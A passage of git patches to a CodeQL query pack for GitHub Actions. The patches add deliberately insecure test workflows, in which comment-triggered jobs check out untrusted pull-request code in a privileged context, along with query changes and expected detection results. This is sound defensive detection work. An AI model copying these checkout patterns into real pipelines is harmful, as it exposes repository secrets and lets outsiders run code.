actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + test2: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + test3: + runs-on: ubuntu-20.04 + steps: + - name: resolve pr refs + id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_ref }} + fetch-depth: 0 + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_sha }} + fetch-depth: 0 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml new file mode 100644 index 00000000000..ece4c02c356 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml @@ -0,0 +1,46 @@ +name: Direct access + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + if: github.event_name == 'issue_comment' && github.event.issue.pull_request + steps: + - name: Unsafe Code Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch + test2: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: refs/pull/${{ github.event.issue.number }}/merge + + test3: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} + + test4: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} + + test5: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml new file mode 100644 index 00000000000..8c0865f598c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml @@ -0,0 +1,50 @@ +name: Heuristic based + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test2: + runs-on: ubuntu-latest + + steps: + - name: Detect branch for PR + id: vars + run: | + PR=$( echo "${{ github.event.comment.issue_url }}" | grep -oE 'issues/([0-9]+)$' | cut -d'/' -f 2 ) + PR_INFO=$( curl \ + --request GET \ + --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \ + --header 'content-type: application/json' \ + --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR ) + REF=$(echo "${PR_INFO}" | jq -r .head.ref) + echo "branch=$REF" >> $GITHUB_OUTPUT + - uses: actions/checkout@v4 + with: + ref: ${{ steps.vars.outputs.branch }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml new file mode 100644 index 00000000000..1245d0302fb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -0,0 +1,114 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR + uses: octokit/request-action@v2.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} + token: ${{ secrets.GITHUB_TOKEN }} + + test2: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test3: + if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v4 + with: + result-encoding: string + script: | + const { owner, repo, number } = context.issue; + const pr = await github.pulls.get({ + owner, + repo, + pull_number: number, + }); + return pr.data.head.sha + - uses: actions/checkout@v2 + with: + ref: ${{ steps.sha.outputs.result }} + + test4: + if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v6 + with: + result-encoding: string + script: | + const response = await github.request(context.payload.issue.pull_request.url); + return response.data.head.sha; + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.sha.outputs.result }} + + test5: + runs-on: ubuntu-20.04 + steps: + - id: request + uses: octokit/request-action@v2.0.2 + with: + route: ${{ github.event.issue.pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 67fcc5555d1..48b7b762605 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -3,6 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index be1c7cbfebd..c7f4e4ad1c2 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1,4 +1,13 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 22d0600da8d8a58fba75ca358b7e439111af5441 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 13:28:39 +0100 Subject: [PATCH 0107/1267] Support more PR head checkouts --- ql/lib/codeql/actions/Ast.qll | 4 +++- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 9 +++++++++ .../Security/CWE-829/UntrustedCheckout.expected | 8 ++++++++ 4 files changed, 22 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 70424a46f95..4a7ff12b4f9 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -232,7 +232,9 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { + string getStepId() { result = super.getStepId() } +} class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 084474b4020..5c6ce37fa92 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -858,6 +858,8 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } + + string getStepId() { result = stepId } } /** diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index a24c80a2f60..f12f1102087 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -66,6 +66,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" ], _, _) ) } @@ -80,6 +81,14 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ( containsHeadRef(this.getArgumentExpr("ref").getExpression()) or + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%sha%", "%head%", "branch"]) or + e.getFieldName().matches(["%sha%", "%head%", "branch"]) + ) + ) + or exists(UsesStep head | head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index c7f4e4ad1c2..a6f02e7752a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -10,4 +10,12 @@ | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 778d8978b05267a6b1eed1df7d5e03cb8ea9f8a7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 13:55:10 +0100 Subject: [PATCH 0108/1267] DF support for untrusted checkout query --- .../dataflow/internal/DataFlowPublic.qll | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 18 ++++++++----- .../issue_comment_3rd_party_action.yml | 1 - .../.github/workflows/untrusted_checkout.yml | 26 ++++++------------- .../CWE-829/UnpinnedActionsTag.expected | 8 +++--- .../CWE-829/UntrustedCheckout.expected | 11 ++++---- 6 files changed, 30 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8e8ed5d9280..681d6f1cfc3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -176,6 +176,7 @@ class FieldContent extends Content, TFieldContent { } predicate hasLocalFlow(Node n1, Node n2) { + n1 = n2 or simpleLocalFlowStep(n1, n2) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index f12f1102087..1be8a6ea0f5 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -79,8 +79,19 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ActionsCheckout() { this.getCallee() = "actions/checkout" and ( - containsHeadRef(this.getArgumentExpr("ref").getExpression()) + // ref argument contains the head ref + exists(Expression e | + containsHeadRef(e.getExpression()) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep head | + head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) + ) + or + // heuristic base on the step id and field name exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( @@ -88,11 +99,6 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { e.getFieldName().matches(["%sha%", "%head%", "branch"]) ) ) - or - exists(UsesStep head | - head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) - ) ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 4de47d6f17a..221854ec204 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -13,7 +13,6 @@ jobs: if: ${{ github.event_name == 'issue_comment' }} uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} uses: actions/checkout@v3 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index a37ceb8f9f6..6bcdcbb4291 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -3,23 +3,13 @@ on: jobs: build: - name: Build and test runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} steps: - - uses: actions/checkout@v2 - with: - ref: ${{ github.event.pull_request.head.sha }} - - - uses: actions/setup-node@v1 - - run: | - npm install - npm build - - - uses: completely/fakeaction@v2 - with: - arg1: ${{ secrets.supersecret }} - - - uses: fakerepo/comment-on-pr@v1 - with: - message: | - Thank you! + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 48b7b762605..c3a3ec2f988 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -3,14 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index a6f02e7752a..cf9d6c01d49 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1,10 +1,10 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | @@ -18,4 +18,5 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout 